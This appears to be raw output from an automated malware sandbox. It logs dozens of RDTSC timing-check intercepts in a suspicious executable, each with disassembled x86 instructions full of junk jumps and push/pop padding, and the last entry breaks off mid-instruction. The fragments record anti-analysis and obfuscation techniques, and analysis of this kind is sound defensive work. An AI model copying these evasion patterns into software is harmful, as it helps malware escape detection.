Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D704B1 second address: 4D704C0 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D704C0 second address: 4D704C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D704C4 second address: 4D704CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D704CA second address: 4D70532 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC9D915F4BCh 0x00000009 adc si, 2288h 0x0000000e jmp 00007FC9D915F4BBh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FC9D915F4C8h 0x0000001a or ax, 84E8h 0x0000001f jmp 00007FC9D915F4BBh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 mov dword ptr [esp], ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FC9D915F4C5h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D505A3 second address: 4D505A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D505A9 second address: 4D505AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D505AD second address: 4D505F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC16Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d movsx ebx, si 0x00000010 push eax 0x00000011 push edx 0x00000012 pushfd 0x00000013 jmp 00007FC9D8BCC178h 0x00000018 jmp 00007FC9D8BCC175h 0x0000001d popfd 0x0000001e rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D505F3 second address: 4D50606 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b mov ecx, edx 0x0000000d mov ebx, 42C05368h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D50606 second address: 4D50678 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC16Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FC9D8BCC170h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FC9D8BCC16Dh 0x0000001a add eax, 2A8E3C36h 0x00000020 jmp 00007FC9D8BCC171h 0x00000025 popfd 0x00000026 pushfd 0x00000027 jmp 00007FC9D8BCC170h 0x0000002c adc eax, 53AD6B58h 0x00000032 jmp 00007FC9D8BCC16Bh 0x00000037 popfd 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D7008E second address: 4D700CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC9D915F4C7h 0x00000008 call 00007FC9D915F4C8h 0x0000000d pop eax 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D700CB second address: 4D700CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D700CF second address: 4D700D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D700D3 second address: 4D700D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D700D9 second address: 4D700DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D7033C second address: 4D70358 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC171h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D70358 second address: 4D7035C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D7035C second address: 4D70362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D70362 second address: 4D70382 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D70382 second address: 4D70388 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D90821 second address: 4D90827 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D90827 second address: 4D9082B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D9082B second address: 4D908DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ecx 0x0000000e jmp 00007FC9D915F4C6h 0x00000013 mov eax, dword ptr [774365FCh] 0x00000018 jmp 00007FC9D915F4C0h 0x0000001d test eax, eax 0x0000001f pushad 0x00000020 jmp 00007FC9D915F4BEh 0x00000025 pushfd 0x00000026 jmp 00007FC9D915F4C2h 0x0000002b jmp 00007FC9D915F4C5h 0x00000030 popfd 0x00000031 popad 0x00000032 je 00007FCA4B782577h 0x00000038 jmp 00007FC9D915F4BEh 0x0000003d mov ecx, eax 0x0000003f pushad 0x00000040 mov si, C00Dh 0x00000044 push eax 0x00000045 push edx 0x00000046 call 00007FC9D915F4C8h 0x0000004b pop esi 0x0000004c rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D908DB second address: 4D90969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xor eax, dword ptr [ebp+08h] 0x00000008 jmp 00007FC9D8BCC16Dh 0x0000000d and ecx, 1Fh 0x00000010 pushad 0x00000011 mov ebx, eax 0x00000013 pushfd 0x00000014 jmp 00007FC9D8BCC178h 0x00000019 or esi, 6444F2E8h 0x0000001f jmp 00007FC9D8BCC16Bh 0x00000024 popfd 0x00000025 popad 0x00000026 ror eax, cl 0x00000028 jmp 00007FC9D8BCC176h 0x0000002d leave 0x0000002e jmp 00007FC9D8BCC170h 0x00000033 retn 0004h 0x00000036 nop 0x00000037 mov esi, eax 0x00000039 lea eax, dword ptr [ebp-08h] 0x0000003c xor esi, dword ptr [00A52014h] 0x00000042 push eax 0x00000043 push eax 0x00000044 push eax 0x00000045 lea eax, dword ptr [ebp-10h] 0x00000048 push eax 0x00000049 call 00007FC9DCF4CAC4h 0x0000004e push FFFFFFFEh 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007FC9D8BCC177h 0x00000057 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D90969 second address: 4D909A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC9D915F4C8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D909A3 second address: 4D909A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D909A7 second address: 4D909AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D909AD second address: 4D909B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D909B3 second address: 4D909B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D909B7 second address: 4D909F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ret 0x00000009 nop 0x0000000a push eax 0x0000000b call 00007FC9DCF4CB2Fh 0x00000010 mov edi, edi 0x00000012 jmp 00007FC9D8BCC174h 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FC9D8BCC177h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D909F0 second address: 4D90A40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FC9D915F4C1h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 mov ecx, 086AECA3h 0x00000016 mov ch, AFh 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b jmp 00007FC9D915F4BBh 0x00000020 pop ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov esi, 71DAFF3Dh 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D40036 second address: 4D4003A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D4003A second address: 4D4003E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D4003E second address: 4D40044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D40044 second address: 4D400AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ebx 0x00000005 pushfd 0x00000006 jmp 00007FC9D915F4BEh 0x0000000b adc cx, DA18h 0x00000010 jmp 00007FC9D915F4BBh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [esp], ebp 0x0000001c pushad 0x0000001d push eax 0x0000001e pushfd 0x0000001f jmp 00007FC9D915F4BBh 0x00000024 adc ecx, 46014EDEh 0x0000002a jmp 00007FC9D915F4C9h 0x0000002f popfd 0x00000030 pop eax 0x00000031 mov edi, 676CEA54h 0x00000036 popad 0x00000037 mov ebp, esp 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D400AB second address: 4D400AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D400AF second address: 4D40146 instructions: 0x00000000 rdtsc 0x00000002 call 00007FC9D915F4C5h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushfd 0x0000000b jmp 00007FC9D915F4C1h 0x00000010 sub esi, 2375AE76h 0x00000016 jmp 00007FC9D915F4C1h 0x0000001b popfd 0x0000001c popad 0x0000001d and esp, FFFFFFF8h 0x00000020 pushad 0x00000021 jmp 00007FC9D915F4BCh 0x00000026 pushfd 0x00000027 jmp 00007FC9D915F4C2h 0x0000002c and ax, 22C8h 0x00000031 jmp 00007FC9D915F4BBh 0x00000036 popfd 0x00000037 popad 0x00000038 xchg eax, ecx 0x00000039 jmp 00007FC9D915F4C6h 0x0000003e push eax 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 mov ecx, edi 0x00000044 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D40146 second address: 4D4014A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D4014A second address: 4D40176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov di, E16Ch 0x0000000a popad 0x0000000b xchg eax, ecx 0x0000000c pushad 0x0000000d pushad 0x0000000e mov dl, C2h 0x00000010 mov esi, 06D8690Fh 0x00000015 popad 0x00000016 push eax 0x00000017 call 00007FC9D915F4BBh 0x0000001c pop esi 0x0000001d pop ebx 0x0000001e popad 0x0000001f xchg eax, ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D40176 second address: 4D4017A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D4017A second address: 4D4017E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D4017E second address: 4D40184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D40184 second address: 4D401D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC9D915F4C6h 0x00000009 or si, 6D18h 0x0000000e jmp 00007FC9D915F4BBh 0x00000013 popfd 0x00000014 call 00007FC9D915F4C8h 0x00000019 pop esi 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D401D2 second address: 4D401D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D401D6 second address: 4D401DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D401DA second address: 4D401E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D401E0 second address: 4D4023E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b mov ebx, esi 0x0000000d mov ebx, eax 0x0000000f popad 0x00000010 mov ebx, dword ptr [ebp+10h] 0x00000013 pushad 0x00000014 jmp 00007FC9D915F4C1h 0x00000019 popad 0x0000001a xchg eax, esi 0x0000001b pushad 0x0000001c call 00007FC9D915F4BCh 0x00000021 mov dx, si 0x00000024 pop esi 0x00000025 mov bx, E4B2h 0x00000029 popad 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FC9D915F4BFh 0x00000032 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D4023E second address: 4D40244 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D40244 second address: 4D402E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 pushad 0x0000000a mov edi, 536235E0h 0x0000000f pushfd 0x00000010 jmp 00007FC9D915F4C9h 0x00000015 add ch, FFFFFFE6h 0x00000018 jmp 00007FC9D915F4C1h 0x0000001d popfd 0x0000001e popad 0x0000001f mov esi, dword ptr [ebp+08h] 0x00000022 pushad 0x00000023 call 00007FC9D915F4BCh 0x00000028 mov di, cx 0x0000002b pop eax 0x0000002c push ebx 0x0000002d pop ebx 0x0000002e popad 0x0000002f xchg eax, edi 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007FC9D915F4C2h 0x00000037 and ah, FFFFFFE8h 0x0000003a jmp 00007FC9D915F4BBh 0x0000003f popfd 0x00000040 jmp 00007FC9D915F4C8h 0x00000045 popad 0x00000046 push eax 0x00000047 pushad 0x00000048 mov al, bl 0x0000004a mov ch, FCh 0x0000004c popad 0x0000004d xchg eax, edi 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 mov ah, 1Dh 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D402E5 second address: 4D402EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D308C3 second address: 4D3094F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC9D915F4C8h 0x00000009 or esi, 21535798h 0x0000000f jmp 00007FC9D915F4BBh 0x00000014 popfd 0x00000015 mov dx, ax 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c pushad 0x0000001d mov ax, E347h 0x00000021 push esi 0x00000022 call 00007FC9D915F4C3h 0x00000027 pop esi 0x00000028 pop edx 0x00000029 popad 0x0000002a push eax 0x0000002b jmp 00007FC9D915F4BFh 0x00000030 xchg eax, ebp 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007FC9D915F4BBh 0x00000038 jmp 00007FC9D915F4C3h 0x0000003d popfd 0x0000003e popad 0x0000003f mov ebp, esp 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D3094F second address: 4D30953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30953 second address: 4D30957 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30957 second address: 4D3095D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D3095D second address: 4D30963 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30963 second address: 4D30967 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30967 second address: 4D3096B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D3096B second address: 4D3097D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and esp, FFFFFFF8h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ecx, edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D3097D second address: 4D30982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30982 second address: 4D30991 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9D8BCC16Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30991 second address: 4D30995 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30995 second address: 4D309A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov si, dx 0x0000000f mov esi, edi 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D309A7 second address: 4D309AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D309AD second address: 4D309B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D309B1 second address: 4D309B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D309B5 second address: 4D30A63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b pushad 0x0000000c mov bx, E19Ah 0x00000010 popad 0x00000011 push esi 0x00000012 jmp 00007FC9D8BCC16Eh 0x00000017 mov dword ptr [esp], esi 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FC9D8BCC16Eh 0x00000021 and si, 3508h 0x00000026 jmp 00007FC9D8BCC16Bh 0x0000002b popfd 0x0000002c pushfd 0x0000002d jmp 00007FC9D8BCC178h 0x00000032 jmp 00007FC9D8BCC175h 0x00000037 popfd 0x00000038 popad 0x00000039 mov esi, dword ptr [ebp+08h] 0x0000003c pushad 0x0000003d push esi 0x0000003e mov eax, edi 0x00000040 pop edx 0x00000041 popad 0x00000042 mov ebx, 00000000h 0x00000047 jmp 00007FC9D8BCC16Eh 0x0000004c test esi, esi 0x0000004e jmp 00007FC9D8BCC170h 0x00000053 je 00007FCA4B241A9Dh 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e popad 0x0000005f rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30A63 second address: 4D30A80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30A80 second address: 4D30AAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC171h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 call 00007FC9D8BCC16Ah 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30AAA second address: 4D30AF2 instructions: 0x00000000 rdtsc 0x00000002 call 00007FC9D915F4BBh 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov di, B12Ch 0x0000000e popad 0x0000000f mov ecx, esi 0x00000011 pushad 0x00000012 push edi 0x00000013 mov ecx, 44E2AF73h 0x00000018 pop ecx 0x00000019 push edx 0x0000001a mov cx, 99EBh 0x0000001e pop esi 0x0000001f popad 0x00000020 je 00007FCA4B7D4D89h 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 jmp 00007FC9D915F4C8h 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30AF2 second address: 4D30BCE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC177h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test byte ptr [77436968h], 00000002h 0x00000010 jmp 00007FC9D8BCC176h 0x00000015 jne 00007FCA4B2419F2h 0x0000001b jmp 00007FC9D8BCC170h 0x00000020 mov edx, dword ptr [ebp+0Ch] 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007FC9D8BCC16Dh 0x0000002a or eax, 058509D6h 0x00000030 jmp 00007FC9D8BCC171h 0x00000035 popfd 0x00000036 popad 0x00000037 xchg eax, ebx 0x00000038 jmp 00007FC9D8BCC16Eh 0x0000003d push eax 0x0000003e pushad 0x0000003f mov dx, 4BA4h 0x00000043 mov esi, edi 0x00000045 popad 0x00000046 xchg eax, ebx 0x00000047 jmp 00007FC9D8BCC16Fh 0x0000004c xchg eax, ebx 0x0000004d jmp 00007FC9D8BCC176h 0x00000052 push eax 0x00000053 jmp 00007FC9D8BCC16Bh 0x00000058 xchg eax, ebx 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 